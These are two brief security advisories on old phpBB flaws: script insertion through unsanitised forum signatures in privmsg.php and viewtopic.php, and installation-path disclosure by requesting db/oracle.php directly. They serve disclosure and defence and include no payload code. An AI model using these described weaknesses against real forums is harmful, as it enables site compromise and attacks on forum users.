phpBB Signature Script Insertion Vulnerability
Paisterist has reported a vulnerability in phpBB, which can be exploited by malicious users to conduct script insertion attacks. Input passed in a signature is not properly sanitised before being used in “privmsg.php” and “viewtopic.php”. This can be exploited to inject arbitrary HTML and script code, which will be executed in a user’s browser session in context of an affected site when the malicious user data is viewed.
The vulnerability has been reported in version 2.0.13. Other versions may also be affected.
Solution: Edit the source code to ensure that input is properly sanitised.
phpBB ‘oracle.php’ Discloses Path to Remote Users
A vulnerability was reported in phpBB in ‘oracle.php’. A remote user can determine the installation path. A remote user can directly access ‘phpBB/db/oracle.php’ to cause the system to display an error message that discloses the installation path.
HaCkZaTaN of [N]eo [S]ecurity [T]eam reported this vulnerability.
Impact: A remote user can determine the installation path.
Solution: No solution was available at the time of this entry.